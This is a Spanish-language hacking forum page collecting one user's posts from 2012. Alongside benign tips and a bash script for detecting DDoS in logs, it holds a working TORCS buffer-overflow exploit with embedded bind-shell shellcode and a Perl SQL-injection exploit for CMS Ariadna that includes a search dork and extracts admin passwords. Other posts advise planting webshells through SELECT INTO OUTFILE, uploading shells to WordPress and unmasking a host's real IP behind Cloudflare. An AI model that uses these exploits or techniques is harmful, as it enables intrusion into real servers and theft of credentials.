Si estuvieran cargadas las reglas de OWASP ese bypass seguro no funciona. En realidad en versiones viejas de las reglas era un bypass exitoso.
Si bien no soy defacer, bien hecho.
Saludos,
Si bien no soy defacer, bien hecho.
Saludos,
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#62
Python / Re:[Python] Zone-H Reporter Update
Diciembre 08, 2012, 01:50:05 AM
Estimado, te doy un par de consejos para "un mejor código":
1.- Define las variables en ingles (Piensa que mañana alguien mas puede usar tu código para agregarle funcionalidades, dejarlo mas prolijo, etc. El ingles es un lenguaje 'internacional'). Como developer te servirá adoptar esta costumbre, muchas empresas del mercado exigen desarrollar "en ingles".
2.- La identacion es importante para un código mas prolijo y legible. No esta mal, pero puede estar mejor.
3.- Usar diferentes estructuras de control hace un código mas performante y prolijo (en tu caso podrías haber usado algún case, y un for).
Recuerda que es una critica constructiva, como algunos son bastantes sensibles me gustaría aclarar que es sin ánimos de ofender ni de "rebajar-despreciar" tu trabajo.
Saludos,
1.- Define las variables en ingles (Piensa que mañana alguien mas puede usar tu código para agregarle funcionalidades, dejarlo mas prolijo, etc. El ingles es un lenguaje 'internacional'). Como developer te servirá adoptar esta costumbre, muchas empresas del mercado exigen desarrollar "en ingles".
2.- La identacion es importante para un código mas prolijo y legible. No esta mal, pero puede estar mejor.
3.- Usar diferentes estructuras de control hace un código mas performante y prolijo (en tu caso podrías haber usado algún case, y un for).
Recuerda que es una critica constructiva, como algunos son bastantes sensibles me gustaría aclarar que es sin ánimos de ofender ni de "rebajar-despreciar" tu trabajo.
Saludos,
#63
Perl / Re:[Perl] SMF Manager 0.1
Diciembre 07, 2012, 08:25:27 PM
Para correrlo en Mac, o derivados de bsd, lo primero que hay que hacer es descargar HTML-Strip del siguiente enlace:
Código: text
Luego descomprimen el archivo, se posicionan en el directorio y ejecutan lo siguiente:
Código: text
Seguramente en derivados de UNIX la instalacion sea igual.
Sobre el script:
1.- El código deberia revisarse.
2.- Hay funcionalidades que no caminan correctamente.
http://search.cpan.org/~kilinrax/HTML-Strip/Luego descomprimen el archivo, se posicionan en el directorio y ejecutan lo siguiente:
sudo perl Makefile.PL
sudo make
sudo make install
Seguramente en derivados de UNIX la instalacion sea igual.
Sobre el script:
1.- El código deberia revisarse.
2.- Hay funcionalidades que no caminan correctamente.
#64
Dudas y pedidos generales / Re:gedit transparente
Diciembre 07, 2012, 07:45:47 PM
Te recomiendo usar VIM. Igual si quieres usar gedit creo que con compiz podrias llegar a lograrlo (hace tiempo que no uso manejadores de ventanas en linux. Pero recuerdo haber visto algún plugin de compiz que permitía customizar la transparencia, etc de determinadas aplicaciones).
#65
Dudas y pedidos generales / Re:ayuda con wordpress subiendo shell
Diciembre 07, 2012, 12:55:21 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Debes obtener la pass de ftp para lograr cambiar los permisos en los themes y poder subir shell. Te lo digo por experiencia.
O eventualmente hacer un bypass desde el admin y alojar la shell en algún directorio de imágenes donde casi siempre tiene permisos de escritura y ejecución.
#66
MAC OSX / Agregar Recent Applications al Dock
Diciembre 07, 2012, 12:44:10 AM
Bueno,
Como muchos sabran, apple tiene una serie de tips & tricks que sus usuarios pueden aprovechar para hacer de sus sistema operativo aun mas potente y usable.
Aqui les muestro como agregar una carpeta al dock con las ultima aplicaciones abiertas para que no tengan que buscarlas si necesitan volver a usarlas luego de cerrarlas:
Ejecuta en una terminal:
Código: text
Reinicia el dock para que tenga efecto:
Código: text
Para que se vea mas "cool" puedes agregarle iconos a la lista del dock:
Código: text
Vuelve a reiniciar el dock para que tenga efecto.
Si no te gusta la lista, puedes usar grid o fan.
Como muchos sabran, apple tiene una serie de tips & tricks que sus usuarios pueden aprovechar para hacer de sus sistema operativo aun mas potente y usable.
Aqui les muestro como agregar una carpeta al dock con las ultima aplicaciones abiertas para que no tengan que buscarlas si necesitan volver a usarlas luego de cerrarlas:
Ejecuta en una terminal:
sudo defaults write com.apple.dock persistent-others -array-add '{ "tile-data" = { "list-type" = 1; }; "tile-type" = "recents-tile"; }'Reinicia el dock para que tenga efecto:
killall DockPara que se vea mas "cool" puedes agregarle iconos a la lista del dock:
defaults write com.apple.dock use-new-list-stack -bool YESVuelve a reiniciar el dock para que tenga efecto.
Si no te gusta la lista, puedes usar grid o fan.
#67
Batch - Bash / Tool basica para detectar DDos postmortem & en tiempo real
Noviembre 03, 2012, 10:21:42 PM
Buenas,
Un cliente nos llamo por un supuesto ataque de denegacion de servicio que sufrieron hace algunos dias. Baiscamente la arquitectura es un RP (ReverseProxy), con mod_security & mod_evasive, un proxy IBM (Webseal), dos servidores de aplicaciones y una base de datos con su correspondiente stand by. Los equipos se encuentran en vlans separadas, las comunicaciones se hacen mediante un FW (Firewall) ASA (Cisco).
Mod_Security & mod_evasive estaban desactivados para el sitio que supuestamente fue atacado.
El FW no estaba logueando paquetes que deja pasar, ni tampoco aquellos que dropea. Esto hizo que el analisis del supuesto ataque DDos no se pudiera comenzar por el FW. Las graficas del iClass del servicio mostraban una saturacion de 24 horas. Estaba saturada tanto la salida como la bajada.
En base a esto comence a analizar los access_logs (posterior a una revission del log de messages y security). El RP contiene mas de 50 vhosts, analizar uno a uno se estaba volviendo un dolor de cabeza interminable.
Se me ocurrio hacer un pequeño (y muy basico), script que me ayudara a analizar rapidamente los logs.
Desarrolle una tool bien básica que nos permite determinar ataques DDos, Ataques DDos mediante botnets, Uer Agents con mayor actividad y cantidad de conexiones activas en un momento determinado para poder detectar un DDos en tiempo real:
1.- La opción uno analiza la cantidad de peticiones de una ip determinada. Esto lo hace leyendo sobre el archivo de logs o el directorio donde se encuentran los archivos.
La primera columna es la cantidad de peticiones, la segunda son las ip's.
2.- La opción dos permite identificar si hubo algún ataque ocasionado por una botnet. Cuando se ataca con botnets, en los access_logs quedan patrones muy específicos. Por ejemplo: muchísimos gets a un archivo especifico y no a todo el sitio.
3.- La opción tres permite detectar cuales son los user agents con mayor actividad. En algunos casos, cuando se realizan ddoss con tools especificas, estas vienen con sus propios user agents, lo cual hace que sea bastante sencillo detectarlos.
4.- La opción cuatro permite detectar en tiempo real la cantidad de conexiones activas al servidor y sus ip's de origen. Sirve mas que nada para detectar ataques DDos en tiempo real. Una opción interesante que le agregue es la posibilidad de guardar en un log la cantidad de conexiones activas en un momento determinado para poder analizarlo luego.
Como les comentaba, la herramienta es muy sencilla, basica y hecha en 10 minutos (puede tener errores). Esta hecha en bash, usa netstat, awk y algunos comandos bastante básicos de linux.
Código: text
Un cliente nos llamo por un supuesto ataque de denegacion de servicio que sufrieron hace algunos dias. Baiscamente la arquitectura es un RP (ReverseProxy), con mod_security & mod_evasive, un proxy IBM (Webseal), dos servidores de aplicaciones y una base de datos con su correspondiente stand by. Los equipos se encuentran en vlans separadas, las comunicaciones se hacen mediante un FW (Firewall) ASA (Cisco).
Mod_Security & mod_evasive estaban desactivados para el sitio que supuestamente fue atacado.
El FW no estaba logueando paquetes que deja pasar, ni tampoco aquellos que dropea. Esto hizo que el analisis del supuesto ataque DDos no se pudiera comenzar por el FW. Las graficas del iClass del servicio mostraban una saturacion de 24 horas. Estaba saturada tanto la salida como la bajada.
En base a esto comence a analizar los access_logs (posterior a una revission del log de messages y security). El RP contiene mas de 50 vhosts, analizar uno a uno se estaba volviendo un dolor de cabeza interminable.
Se me ocurrio hacer un pequeño (y muy basico), script que me ayudara a analizar rapidamente los logs.
Desarrolle una tool bien básica que nos permite determinar ataques DDos, Ataques DDos mediante botnets, Uer Agents con mayor actividad y cantidad de conexiones activas en un momento determinado para poder detectar un DDos en tiempo real:
1.- La opción uno analiza la cantidad de peticiones de una ip determinada. Esto lo hace leyendo sobre el archivo de logs o el directorio donde se encuentran los archivos.
La primera columna es la cantidad de peticiones, la segunda son las ip's.
2.- La opción dos permite identificar si hubo algún ataque ocasionado por una botnet. Cuando se ataca con botnets, en los access_logs quedan patrones muy específicos. Por ejemplo: muchísimos gets a un archivo especifico y no a todo el sitio.
3.- La opción tres permite detectar cuales son los user agents con mayor actividad. En algunos casos, cuando se realizan ddoss con tools especificas, estas vienen con sus propios user agents, lo cual hace que sea bastante sencillo detectarlos.
4.- La opción cuatro permite detectar en tiempo real la cantidad de conexiones activas al servidor y sus ip's de origen. Sirve mas que nada para detectar ataques DDos en tiempo real. Una opción interesante que le agregue es la posibilidad de guardar en un log la cantidad de conexiones activas en un momento determinado para poder analizarlo luego.
Como les comentaba, la herramienta es muy sencilla, basica y hecha en 10 minutos (puede tener errores). Esta hecha en bash, usa netstat, awk y algunos comandos bastante básicos de linux.
#!/bin/bash
#Beta Version developed by s3cur1tyr00t
bold=`tput bold`
normal=`tput sgr0`
menu="
${bold}
########################################
# 1.- Cantidad de peticiones por IP #
# 2.- URL's con mayor acceso (Botnet?) #
# 3.- User Agents con mayor actividad #
# 4.- Cantidad de conexiones activas #
# 5.- Cerrar #
########################################
${normal}
"
echo "$menu "
read option
case "$option" in
1) echo "Ingreso la opcion ${bold}$option
${normal}Escriba ruta del archivo de logs (ruta del directorio para buscar en todos los archivos): "
read log_file
tail -n 10000 $log_file | cut -f 1 -d ' ' | sort | uniq -c | sort -nr | more
;;
2) echo "Ingreso la opcion ${bold}$option
${normal}Escriba ruta del archivo de logs (ruta del directorio para buscar en todos los archivos): "
read log_file
cut -f 2 -d '"' $log_file | cut -f 2 -d ' ' | sort | uniq -c | sort -nr | more
;;
3) echo "Ingreso la opcion ${bold}$option
${normal}Escriba ruta del archivo de logs (ruta del directorio para buscar en todos los archivos): "
read log_file
cut -f 4 -d '"' $log_file | sort | uniq -c | sort -nr | more
;;
4) echo "Ingreso la opcion ${bold}$option
${normal}Cantidad de conexiones activas: "
netstat -an | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
echo "
${bold}Que desea hacer?${normal}
1.- Guardar Salida en archivo de log
2.- Salir
"
read output
case "$output" in
1) echo "Defina nombre archivo: "
read file_name
netstat -an | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n > $file_name
;;
2) exit
;;
esac
;;
5) exit
;;
esac
exit #68
Dudas y pedidos generales / Re:Incompatibilidades de documentos Windows - Linux
Julio 10, 2012, 02:13:53 PM
Probaste libre office?.
#69
Dudas y pedidos generales / Re:[Duda] Webcams...
Julio 07, 2012, 07:13:29 PM #70
Otros lenguajes / Re:Reto de Programacion [Eliminar Espacios]
Julio 07, 2012, 07:06:47 PM
Hice uno en perl y otro en ruby simplemente para no repetir el lenguaje que usaron las otras personas que lo realizaron:
PERL:
RUBY:
Saludos,
PERL:
RUBY:
Saludos,
#71
Dudas y pedidos generales / Re:Panel de administración
Junio 25, 2012, 02:29:21 AM
El panel de administración lo estas buscando porque tenes una sqli en un sitio?.
De ser así puedes intentar encontrar una ruta escribible (path disclosure) en el servidor, generando algún error en la aplicación. Luego mediante una sentencia sql similar a la siguiente puedes obtener una webshell:.
Ejemplo:
Código: text
Saludos,
De ser así puedes intentar encontrar una ruta escribible (path disclosure) en el servidor, generando algún error en la aplicación. Luego mediante una sentencia sql similar a la siguiente puedes obtener una webshell:.
Ejemplo:
SELECT "Codigo shell en base64" INTO OUTFILE 'Path Escribible';Saludos,
#72
Ruby / Instalar Ruby 1.9 en CentOS 6
Junio 25, 2012, 01:40:44 AM
Nos encanta CentOS es una distribución grande ... El problema es que tienen la peor selección de paquetes actualizados. Si usted quiere tener su servidor con las últimas versiones de software, probablemente usted tendrá que compilar las bibliotecas.
Instalar & Configurar Ruby:
Código: text
Otra forma de instalarlo:
Primero instale dependencias:
Código: text
Instalar & Configurar Ruby:
Código: text
Instalar & Configurar Ruby:
$ sudo yum groupinstall 'Development Tools'
$ sudo yum install readline-devel
$ cd /usr/local/src
$ wget http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.3-p0.tar.gz
$ tar xzvf ruby-1.9.3-p0.tar.gz
$ cd ruby-1.9.3-p0
$ ./configure && make $ sudo make install
Otra forma de instalarlo:
Primero instale dependencias:
yum install httpd-devel openssl-devel zlib-devel gcc gcc-c++ curl-devel expat-devel gettext-devel mysql-server readline-devel
Instalar & Configurar Ruby:
yum install -y rpm-build rpmdevtools
rpmdev-setuptree
cd ~/rpmbuild/SOURCES
wget http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.3-p0.tar.gz
cd ~/rpmbuild/SPECS
curl https://raw.github.com/lnxchk/ruby-1.9.3-rpm/master/ruby193.spec > ruby193.spec
rpmbuild -bb ruby193.spec
rpm -Uvh ~/rpmbuild/RPMS/x86_64/ruby-1.9.3p0-1.${ARCH}.rpm #73
C / C++ / [Exploit] TORCS acc Buffer Overflow
Junio 25, 2012, 01:31:37 AM/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE : */
/*
This exploit generates a corrupted acc file
which has to be saved in the directories where
TORCS loads its data, for example replace
cars/car4-trb1/car4-trb1.acc and put test.acc or create
a new car/track and select it in the TORCS menu
*/
#include <stdio.h>
#include <stdlib.h>
/*
Shellcode: windows/shell_bind_tcp LPORT=4444 -b '\x00\xff\x0a'
Encoder: x86/shikata_ga_nai
*/
unsigned char buf[] =
"\xbd\x2e\xed\xb6\x2d\xdd\xc2\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x21\x0f\x43\xd1\xd5\x46"
"\xac\x2a\x25\x39\x24\xcf\x14\x6b\x52\x9b\x04\xbb\x10\xc9\xa4"
"\x30\x74\xfa\x3f\x34\x51\x0d\x88\xf3\x87\x20\x09\x32\x08\xee"
"\xc9\x54\xf4\xed\x1d\xb7\xc5\x3d\x50\xb6\x02\x23\x9a\xea\xdb"
"\x2f\x08\x1b\x6f\x6d\x90\x1a\xbf\xf9\xa8\x64\xba\x3e\x5c\xdf"
"\xc5\x6e\xcc\x54\x8d\x96\x67\x32\x2e\xa6\xa4\x20\x12\xe1\xc1"
"\x93\xe0\xf0\x03\xea\x09\xc3\x6b\xa1\x37\xeb\x66\xbb\x70\xcc"
"\x98\xce\x8a\x2e\x25\xc9\x48\x4c\xf1\x5c\x4d\xf6\x72\xc6\xb5"
"\x06\x57\x91\x3e\x04\x1c\xd5\x19\x09\xa3\x3a\x12\x35\x28\xbd"
"\xf5\xbf\x6a\x9a\xd1\xe4\x29\x83\x40\x41\x9c\xbc\x93\x2d\x41"
"\x19\xdf\xdc\x96\x1b\x82\x88\x5b\x16\x3d\x49\xf3\x21\x4e\x7b"
"\x5c\x9a\xd8\x37\x15\x04\x1e\x37\x0c\xf0\xb0\xc6\xae\x01\x98"
"\x0c\xfa\x51\xb2\xa5\x82\x39\x42\x49\x57\xed\x12\xe5\x07\x4e"
"\xc3\x45\xf7\x26\x09\x4a\x28\x56\x32\x80\x5f\x50\xfc\xf0\x0c"
"\x37\xfd\x06\xa3\x9b\x88\xe1\xa9\x33\xdd\xba\x45\xf6\x3a\x73"
"\xf2\x09\x69\x2f\xab\x9d\x25\x39\x6b\xa1\xb5\x6f\xd8\x0e\x1d"
"\xf8\xaa\x5c\x9a\x19\xad\x48\x8a\x50\x96\x1b\x40\x0d\x55\xbd"
"\x55\x04\x0d\x5e\xc7\xc3\xcd\x29\xf4\x5b\x9a\x7e\xca\x95\x4e"
"\x93\x75\x0c\x6c\x6e\xe3\x77\x34\xb5\xd0\x76\xb5\x38\x6c\x5d"
"\xa5\x84\x6d\xd9\x91\x58\x38\xb7\x4f\x1f\x92\x79\x39\xc9\x49"
"\xd0\xad\x8c\xa1\xe3\xab\x90\xef\x95\x53\x20\x46\xe0\x6c\x8d"
"\x0e\xe4\x15\xf3\xae\x0b\xcc\xb7\xdf\x41\x4c\x91\x77\x0c\x05"
"\xa3\x15\xaf\xf0\xe0\x23\x2c\xf0\x98\xd7\x2c\x71\x9c\x9c\xea"
"\x6a\xec\x8d\x9e\x8c\x43\xad\x8a";
// this points to your shellcode
unsigned char function_pointer [] = "\xA8\xCA\x0E\x10";
int main(int argc, char **argv) {
FILE *save_fd;
int i=0;
save_fd = fopen("test.acc", "w");
if (save_fd == NULL) {
printf("Failed to open '%s' for writing", "test.acc");
return -1;
}
fprintf(save_fd, "AC3Db\n");
fprintf(save_fd, "MATERIAL \"");
for(i=0; i < 607; i++) {
putc('\x90', save_fd);
}
fprintf(save_fd, "%s%s\" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0\n", buf, function_pointer);
fprintf(save_fd, "OBJECT world\n");
fprintf(save_fd, "kids %d\n", 5);
close(save_fd);
return 0;
}
#74
Bugs y Exploits / [Exploit] CMS Airdana SQL Injection
Junio 25, 2012, 01:26:30 AM
EDB-ID: 12301 CVE: 2010-5057 OSVDB-ID: 63929
Author: Andrés Gómez Published: 2010-04-19 Verified:
Exploit Code: Vulnerable App: N/A
Código: perl
Author: Andrés Gómez Published: 2010-04-19 Verified:
Exploit Code: Vulnerable App: N/A
use LWP::Simple;
################################################################
# Malicious users may inject SQL querys into a vulnerable
# application to fool a user in order to gather data from them or see sensible information.
################################################################
# Solution:
# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
################################################################
my $target = $ARGV[0];
unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomez\n\n";
print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
print "\nEjemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/\n" ; exit 1; }
$sql =
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
$final = $target.$sql;
$contenido = get($final);
print "\n\n[+] Pagina Web: $target\n\n";
if ($contenido =~/security(.*):pentest(.*)/) {
print "[-] Datos extraidos con exito:\n\n";
print "[+] Usuario = $1\n";
print "[+] Password = $2\n";
} else {
print "[-] No se obtuvieron datos\n\n";
exit 1;
}
print "\n[ñ] Escriba exit para salir de la aplicacion\n";
exit 1; #75
Bugs y Exploits / Re:Full Source Disclosure by HD_Breaker
Junio 23, 2012, 11:39:53 AM
Yo molestando como siempre 
Si yo fuera el atacante no entraría al admin para bypassear algún uploader. Sino que buscaría una ruta escribible (path disclosure) en el servidor y mediante una sentencia sql similar a la siguiente obtendría una webshell:
Código: text
Si yo fuera el atacante no entraría al admin para bypassear algún uploader. Sino que buscaría una ruta escribible (path disclosure) en el servidor y mediante una sentencia sql similar a la siguiente obtendría una webshell:
SELECT "Codigo shell en base64" INTO OUTFILE 'Path Escribible'; #76
Bugs y Exploits / Re:Subir Shell a través de Inyección SSI (Server-side include)
Junio 23, 2012, 08:44:07 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Una cosilla los comandos donde los ejecutas en la barra de navegacion en el login o donde?
Gracias de antemano
Los comandos los puedes ejecutar tanto en el input text del usuario, como en la variable que pasa datos a partir de lo que tu escribes. Cuando me refiero a la variable estoy hablando de ¨la url¨.
Saludos,
#77
Bugs y Exploits / Re:Subir Shell a través de Inyección SSI (Server-side include)
Junio 22, 2012, 08:55:18 PM
Muy bueno, lo estuve probando un poquito... en algunos casos es posible establecer una conexión reversa con la shell del sistema operativo víctima.
Gracias por compartir...
Saludos,
Gracias por compartir...
Saludos,
#78
Hacking / Re:Obteniendo IP Real en Sitios Protegidos por CLOUDFLARE
Junio 21, 2012, 03:37:54 PM
Gracias por compartir.
A continuación publico otra forma de obtener la ip real del host mediante un bruteo a las dns (lo cuál es practicamente lo mismo que hace el script pero en este caso sería a mano):
Código: text
Código: text
Como se puede observar, 170.210.156.90 es la ip del host que aloja a remoteexecution.
Aprovecho también para comentar que el script publicado por CalebBucker puede ser ejecutado por línea de comandos (basta con tener php instalado), de esta manera nos ahorraríamos tener que subirlo a un hosting.
Ejemplo de ejecución:
Código: text
Saludos,
A continuación publico otra forma de obtener la ip real del host mediante un bruteo a las dns (lo cuál es practicamente lo mismo que hace el script pero en este caso sería a mano):
MacBook-de-Andres-Gomez:~ andresgo$ sudo nmap -sV -sS -F www.remoteexecution.info
Password:
Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-21 15:32 UYT
Nmap scan report for www.remoteexecution.info (108.162.197.78)
Host is up (0.80s latency).
Other addresses for www.remoteexecution.info (not scanned): 108.162.197.178
Not shown: 96 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http cloudflare-nginx
443/tcp closed https
8080/tcp open http cloudflare-nginx
8443/tcp closed https-alt
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.10 secondsMacBook-de-Andres-Gomez:~ andresgo$ sudo nmap --script dns-brute -sn www.remoteexecution.info
Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-21 15:33 UYT
Nmap scan report for www.remoteexecution.info (108.162.197.78)
Host is up (0.83s latency).
Other addresses for www.remoteexecution.info (not scanned): 108.162.197.178
Host script results:
| dns-brute:
| DNS Brute-force hostnames
| www.remoteexecution.info - 108.162.197.178
| www.remoteexecution.info - 108.162.197.78
| mail.remoteexecution.info - 170.210.156.90
| ipv6.remoteexecution.info - 108.162.197.178
| ipv6.remoteexecution.info - 108.162.197.78
| ipv6.remoteexecution.info - 2400:cb00:2048:1:0:0:6ca2:c54e
| ipv6.remoteexecution.info - 2400:cb00:2048:1:0:0:6ca2:c5b2
| direct.remoteexecution.info - 170.210.156.90
|_ ftp.remoteexecution.info - 170.210.156.90
Nmap done: 1 IP address (1 host up) scanned in 43.94 seconds
Como se puede observar, 170.210.156.90 es la ip del host que aloja a remoteexecution.
Aprovecho también para comentar que el script publicado por CalebBucker puede ser ejecutado por línea de comandos (basta con tener php instalado), de esta manera nos ahorraríamos tener que subirlo a un hosting.
Ejemplo de ejecución:
MacBook-de-Andres-Gomez:~ andresgo$ php cf.php remoteexecution.info
mail.remoteexecution.info = 170.210.156.90
direct.remoteexecution.info = 170.210.156.90
direct-connect.remoteexecution.info = 170.210.156.90
cpanel.remoteexecution.info = 170.210.156.90
ftp.remoteexecution.info = 170.210.156.90Saludos,
#79
Dudas y pedidos generales / Re:[Duda] Función en PHP
Junio 21, 2012, 02:47:33 PM
Estimado,
Un ejemplo de como implementarlo:
Código: text
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Otro Ejemplo:
Código: text
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hace algún tiempo hice un conversor con html y js para realizar inyecciones sql: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Código: text
Espero te sirva de algo los ejemplos.
Saludos!.
Un ejemplo de como implementarlo:
<?php
$string ="This is an example string with a few specialy symbols: *?%&/äö$ü!";
for($i = 0; $i != strlen($string); $i++)
{
$asciiString .= "&#".ord($string[$i]).";";
}
$asciiCode = str_replace("&", "&", $asciiString);
echo "String in ASCII:<br>";
echo $asciiString;
echo "<br>The code:<br>";
echo $asciiCode;
?>Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Otro Ejemplo:
function string_to_ascii($string)
{
$ascii = NULL;
for ($i = 0; $i < strlen($string); $i++)
{
$ascii += ord($string[$i]);
}
return($ascii);
}Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hace algún tiempo hice un conversor con html y js para realizar inyecciones sql: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>Convertidor de texto a ASCII</title>
<script language="javascript">
var browsertype = "IE4x"
if (document.all){browsertype = "IE4x"}else{}
if (document.layers){browsertype = "NN4x"}else{}
if (navigator.appVersion.indexOf("MSIE 5", 0) != -1){browsertype = "IE5xDOM"}else{}
if (navigator.appName == "Netscape" &&
parseInt(navigator.appVersion) >= 5){browsertype = "NN6xDOM"}else{}
letra = new Array()
conversion = new Array()
letra[1] = "a"; conversion[1] = "97,"
letra[2] = "b"; conversion[2] = "98,"
letra[3] = "c"; conversion[3] = "99,"
letra[4] = "d"; conversion[4] = "100,"
letra[5] = "e"; conversion[5] = "101,"
letra[6] = "f"; conversion[6] = "102,"
letra[7] = "g"; conversion[7] = "103,"
letra[8] = "h"; conversion[8] = "104,"
letra[9] = "i"; conversion[9] = "105,"
letra[10] = "j"; conversion[10] = "106,"
letra[11] = "k"; conversion[11] = "107,"
letra[12] = "l"; conversion[12] = "108,"
letra[13] = "m"; conversion[13] = "109,"
letra[14] = "n"; conversion[14] = "110,"
letra[15] = "o"; conversion[15] = "111,"
letra[16] = "p"; conversion[16] = "112,"
letra[17] = "q"; conversion[17] = "113,"
letra[18] = "r"; conversion[18] = "114,"
letra[19] = "s"; conversion[19] = "115,"
letra[20] = "t"; conversion[20] = "116,"
letra[21] = "u"; conversion[21] = "117,"
letra[22] = "v"; conversion[22] = "118,"
letra[23] = "w"; conversion[23] = "119,"
letra[24] = "x"; conversion[24] = "120,"
letra[25] = "y"; conversion[25] = "121,"
letra[26] = "z"; conversion[26] = "122,"
letra[27] = "A"; conversion[27] = "65,"
letra[28] = "B"; conversion[28] = "66,"
letra[29] = "C"; conversion[29] = "67,"
letra[30] = "D"; conversion[30] = "68,"
letra[31] = "E"; conversion[31] = "69,"
letra[32] = "F"; conversion[32] = "70,"
letra[33] = "G"; conversion[33] = "71,"
letra[34] = "H"; conversion[34] = "72,"
letra[35] = "I"; conversion[35] = "73,"
letra[36] = "J"; conversion[36] = "74,"
letra[37] = "K"; conversion[37] = "75,"
letra[38] = "L"; conversion[38] = "76,"
letra[39] = "M"; conversion[39] = "77,"
letra[40] = "N"; conversion[40] = "78,"
letra[41] = "O"; conversion[41] = "79,"
letra[42] = "P"; conversion[42] = "80,"
letra[43] = "Q"; conversion[43] = "81,"
letra[44] = "R"; conversion[44] = "82,"
letra[45] = "S"; conversion[45] = "83,"
letra[46] = "T"; conversion[46] = "84,"
letra[47] = "U"; conversion[47] = "85,"
letra[48] = "V"; conversion[48] = "86,"
letra[49] = "W"; conversion[49] = "87,"
letra[50] = "X"; conversion[50] = "88,"
letra[51] = "Y"; conversion[51] = "89,"
letra[52] = "Z"; conversion[52] = "90,"
letra[53] = "0"; conversion[53] = "48,"
letra[54] = "1"; conversion[54] = "49,"
letra[55] = "2"; conversion[55] = "50,"
letra[56] = "3"; conversion[56] = "51,"
letra[57] = "4"; conversion[57] = "52,"
letra[58] = "5"; conversion[58] = "53,"
letra[59] = "6"; conversion[59] = "54,"
letra[60] = "7"; conversion[60] = "55,"
letra[61] = "8"; conversion[61] = "56,"
letra[62] = "9"; conversion[62] = "57,"
letra[63] = " "; conversion[63] = "32,"
letra[64] = "\!"; conversion[64] = "33,"
letra[65] = "\""; conversion[65] = "34,"
letra[66] = "\#"; conversion[66] = "35,"
letra[67] = "\$"; conversion[67] = "36,"
letra[68] = "\%"; conversion[68] = "37,"
letra[69] = "\&"; conversion[69] = "38,"
letra[70] = "\'"; conversion[70] = "39,"
letra[71] = "\("; conversion[71] = "40,"
letra[72] = "\)"; conversion[72] = "41,"
letra[73] = "\*"; conversion[73] = "42,"
letra[74] = "\+"; conversion[74] = "43,"
letra[75] = "\,"; conversion[75] = "44,"
letra[76] = "\-"; conversion[76] = "45,"
letra[77] = "\."; conversion[77] = "46,"
letra[78] = "\/"; conversion[78] = "47,"
letra[79] = "\:"; conversion[79] = "58,"
letra[80] = "\;"; conversion[80] = "59,"
letra[81] = "\<"; conversion[81] = "60,"
letra[82] = "\="; conversion[82] = "61,"
letra[83] = "\>"; conversion[83] = "62,"
letra[84] = "\?"; conversion[84] = "63,"
letra[85] = "\@"; conversion[85] = "64,"
letra[86] = "\["; conversion[86] = "91,"
letra[87] = "\\"; conversion[87] = "92,"
letra[88] = "\]"; conversion[88] = "93,"
letra[89] = "\^"; conversion[89] = "94,"
letra[90] = "\_"; conversion[90] = "95,"
letra[91] = "\`"; conversion[91] = "96,"
letra[92] = "\{"; conversion[92] = "123,"
letra[93] = "\|"; conversion[93] = "124,"
letra[94] = "\}"; conversion[94] = "125,"
letra[95] = "\~"; conversion[95] = "126,"
function preguntame(){
if (document.convertirformulario.texto.value == ""){
alert("Primero ingresa el texto a convertir"); return;}else{};
var ElTexto = document.convertirformulario.texto.value;
var ElConvierte = "";
var Tag = false;
for(i=0; i<=ElTexto.length-1; i++){
andresg888 = "zzz";
mmrg5486 = ElTexto.charAt(i);
if((mmrg5486 == "\<") && (document.convertirformulario.cb.checked)){Tag = true}else{}
for(j=1; j<=95; j++){
if (mmrg5486 == letra[j]){andresg888 = conversion[j];}else{}
}
if (andresg888 == "zzz"){andresg888 = mmrg5486}else{};
if (Tag){
andresg888 = mmrg5486;
if(mmrg5486 == "\>"){Tag = false}else{}
}else{}
ElConvierte += andresg888;
}
document.convertirformulario.ascii.value = ElConvierte;
}
function ejemplo1(){
ejemplo = "Esto es un texto, lo convertiremos y veremos que pasa. Observe el cuadro de abajo...\n"
document.convertirformulario.texto.value = ejemplo;
preguntame();
}
function limpiame(){
document.convertirformulario.texto.value = "";
document.convertirformulario.ascii.value = "";
}
</script>
<style type="text/css">
.ta {font-family:Times New Roman,serif; font-size:13px; font-style:normal; font-weight:normal}
body,td,th {
color: #CCC;
}
body {
